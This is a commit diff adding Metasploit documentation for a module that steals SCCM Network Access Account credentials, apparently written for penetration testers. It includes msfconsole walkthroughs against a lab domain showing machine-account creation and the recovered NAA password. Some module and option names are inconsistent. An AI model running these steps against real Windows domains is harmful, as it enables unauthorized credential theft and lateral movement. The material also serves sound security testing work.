|
| 1 | +## NAA Credential Exploitation |
| 2 | + |
| 3 | +The NAA account is used by some SCCM configurations in the policy deployment process. It does not require many privileges, but |
| 4 | +in practice is often misconfigured to have excessive privileges. |
| 5 | + |
| 6 | +The account can be retrieved in various ways, many requiring local administrative privileges on an existing host. However, |
| 7 | +it can also be requested by an existing computer account, which by default most user accounts are able to create. |
| 8 | + |
| 9 | + |
| 10 | +## Module usage |
| 11 | +The `admin/dcerpc/samr_computer` module is generally used to first create a computer account, which requires no permissions: |
| 12 | + |
| 13 | +1. From msfconsole |
| 14 | +2. Do: `use auxiliary/admin/dcerpc/samr_account` |
| 15 | +3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options |
| 16 | + a. For the `ADD_COMPUTER` action, if you don't specify `ACCOUNT_NAME` or `ACCOUNT_PASSWORD` - one will be generated automatically |
| 17 | + b. For the `DELETE_ACCOUNT` action, set the `ACCOUNT_NAME` option |
| 18 | + c. For the `LOOKUP_ACCOUNT` action, set the `ACCOUNT_NAME` option |
| 19 | +4. Run the module and see that a new machine account was added |
| 20 | + |
| 21 | +Then the `auxiliary/admin/sccm/get_naa_credentials` module can be used: |
| 22 | + |
| 23 | +1. `use auxiliary/admin/sccm/get_naa_credentials` |
| 24 | +2. Set the `RHOST` value to a target domain controller (if LDAP autodiscovery is used) |
| 25 | +3. Set the `USERNAME` and `PASSWORD` information to a domain account |
| 26 | +4. Set the `COMPUTER_USER` and `COMPUTER_PASSWORD` to the values obtained through the `samr_computer` module |
| 27 | +5. Run the module to obtain the NAA credentials, if present. |
| 28 | + |
| 29 | +Alternatively, if the Management Point and Site Code are known, the module can be used without autodiscovery: |
| 30 | + |
| 31 | +1. `use auxiliary/admin/sccm/get_naa_credentials` |
| 32 | +2. Set the `COMPUTER_USER` and `COMPUTER_PASSWORD` to the values obtained through the `samr_computer` module |
| 33 | +3. Set the `MANAGEMENT_POINT` and `SITE_CODE` to the known values. |
| 34 | +4. Run the module to obtain the NAA credentials, if present. |
| 35 | + |
| 36 | +The management point and site code can be retrieved using the `auxiliary/gather/ldap_query` module, using the `ENUM_SCCM_MANAGEMENT_POINTS` action. |
| 37 | + |
| 38 | +See the Scenarios for a more detailed walk through |
| 39 | + |
| 40 | +## Options |
| 41 | + |
| 42 | +### RHOST, USERNAME, PASSWORD, DOMAIN, SESSION, RHOST |
| 43 | +Options used to authenticate to the Domain Controller's LDAP service for SCCM autodiscovery. |
| 44 | + |
| 45 | +### COMPUTER_USER, COMPUTER_PASSWORD |
| 46 | + |
| 47 | +Credentials for a computer account (may be created with the `samr_account` module). If you've retrieved the NTLM hash of |
| 48 | +a computer account, you can use that for COMPUTER_PASSWORD. |
| 49 | + |
| 50 | +### MANAGEMENT_POINT |
| 51 | +The SCCM server. |
| 52 | + |
| 53 | +### SITE_CODE |
| 54 | +The Site Code of the management point. |
| 55 | + |
| 56 | +## Scenarios |
| 57 | +In the following example the user `ssccm.lab\eve` is a low-privilege user. |
| 58 | + |
| 59 | +### Creating computer account |
| 60 | + |
| 61 | +``` |
| 62 | +msf6 auxiliary(admin/dcerpc/samr_account) > run rhost=192.168.33.10 domain=sccm.lab username=eve password=iloveyou |
| 63 | +[*] Running module against 192.168.33.10 |
| 64 | +
|
| 65 | +[*] 192.168.33.10:445 - Adding computer |
| 66 | +[+] 192.168.33.10:445 - Successfully created sccm.lab\DESKTOP-2KVDWNZ3$ |
| 67 | +[+] 192.168.33.10:445 - Password: pJTrvFyDHiHnqtlqTTNYe2HPVpO3Yekj |
| 68 | +[+] 192.168.33.10:445 - SID: S-1-5-21-3875312677-2561575051-1173664991-1128 |
| 69 | +[*] Auxiliary module execution completed |
| 70 | +``` |
| 71 | + |
| 72 | +### Running with Autodiscovery |
| 73 | +Using the credentials just obtained with the `samr_account` module. |
| 74 | + |
| 75 | +``` |
| 76 | +msf6 auxiliary(admin/sccm/get_naa_credentials) > options |
| 77 | +
|
| 78 | +Module options (auxiliary/admin/sccm/get_naa_credentials): |
| 79 | +
|
| 80 | + Name Current Setting Required Description |
| 81 | + ---- --------------- -------- ----------- |
| 82 | + COMPUTER_PASS yes The password of the provided computer account |
| 83 | + COMPUTER_USER yes The username of a computer account |
| 84 | + MANAGEMENT_POINT no The management point (SCCM server) to use |
| 85 | + SITE_CODE no The site code to use on the management point |
| 86 | + SSL false no Enable SSL on the LDAP connection |
| 87 | + VHOST no HTTP server virtual host |
| 88 | +
|
| 89 | +
|
| 90 | + Used when connecting via an existing SESSION: |
| 91 | +
|
| 92 | + Name Current Setting Required Description |
| 93 | + ---- --------------- -------- ----------- |
| 94 | + SESSION 1 no The session to run this module on |
| 95 | +
|
| 96 | +
|
| 97 | + Used when making a new connection via RHOSTS: |
| 98 | +
|
| 99 | + Name Current Setting Required Description |
| 100 | + ---- --------------- -------- ----------- |
| 101 | + DOMAIN no The domain to authenticate to |
| 102 | + PASSWORD no The password to authenticate with |
| 103 | + RHOSTS no The domain controller (for autodiscovery). Not required if providing a management point and site code |
| 104 | + RPORT 389 no The LDAP port of the domain controller (for autodiscovery). Not required if providing a management point and site code (TCP) |
| 105 | + USERNAME no The username to authenticate with |
| 106 | +
|
| 107 | +
|
| 108 | +View the full module info with the info, or info -d command. |
| 109 | +msf6 auxiliary(admin/sccm/get_naa_credentials) > run rhost=192.168.33.10 username=eve domain=sccm.lab password=iloveyou computer_user=DESKTOP-2KVDWNZ3$ computer_pass=pJTrvFyDHiHnqtlqTTNYe2HPVpO3Yekj |
| 110 | +[*] Running module against 192.168.33.10 |
| 111 | +
|
| 112 | +[*] Discovering base DN automatically |
| 113 | +[*] 192.168.33.10:389 Discovered base DN: DC=sccm,DC=lab |
| 114 | +[+] Found Management Point: MECM.sccm.lab (Site code: P01) |
| 115 | +[*] Got SMS ID: BD0DC478-A71A-4348-BD14-B7E91335738E |
| 116 | +[*] Waiting 5 seconds for SCCM DB to update... |
| 117 | +[*] Got NAA Policy URL: http://<mp>/SMS_MP/.sms_pol?{c48754cc-090c-4c56-ba3d-532b5ce5e8a5}.2_00 |
| 118 | +[+] Found valid NAA credentials: sccm.lab\sccm-naa:123456789 |
| 119 | +[*] Auxiliary module execution completed |
| 120 | +``` |
| 121 | + |
| 122 | +### Manual discovery |
| 123 | + |
| 124 | +``` |
| 125 | +msf6 auxiliary(gather/ldap_query) > run rhost=192.168.33.10 username=eve domain=sccm.lab password=iloveyou |
| 126 | +[*] Running module against 192.168.33.10 |
| 127 | +
|
| 128 | +[*] 192.168.33.10:389 Discovered base DN: DC=sccm,DC=lab |
| 129 | +CN=SMS-MP-P01-MECM.SCCM.LAB,CN=System Management,CN=System,DC=sccm,DC=lab |
| 130 | +========================================================================= |
| 131 | +
|
| 132 | + Name Attributes |
| 133 | + ---- ---------- |
| 134 | + cn SMS-MP-P01-MECM.SCCM.LAB |
| 135 | + dnshostname MECM.sccm.lab |
| 136 | + mssmssitecode P01 |
| 137 | +
|
| 138 | +[*] Query returned 1 result. |
| 139 | +[*] Auxiliary module execution completed |
| 140 | +
|
| 141 | +msf6 auxiliary(gather/ldap_query) > use auxiliary/admin/sccm/get_naa_credentials |
| 142 | +
|
| 143 | +msf6 auxiliary(admin/sccm/get_naa_credentials) > run computer_user=DESKTOP-2KVDWNZ3$ computer_pass=pJTrvFyDHiHnqtlqTTNYe2HPVpO3Yekj management_point=MECM.sccm.lab site_code=P01 |
| 144 | +
|
| 145 | +[*] Got SMS ID: BD0DC478-A71A-4348-BD14-B7E91335738E |
| 146 | +[*] Waiting 5 seconds for SCCM DB to update... |
| 147 | +[*] Got NAA Policy URL: http://<mp>/SMS_MP/.sms_pol?{c48754cc-090c-4c56-ba3d-532b5ce5e8a5}.2_00 |
| 148 | +[+] Found valid NAA credentials: sccm.lab\sccm-naa:123456789 |
| 149 | +[*] Auxiliary module execution completed |
| 150 | +``` |
0 commit comments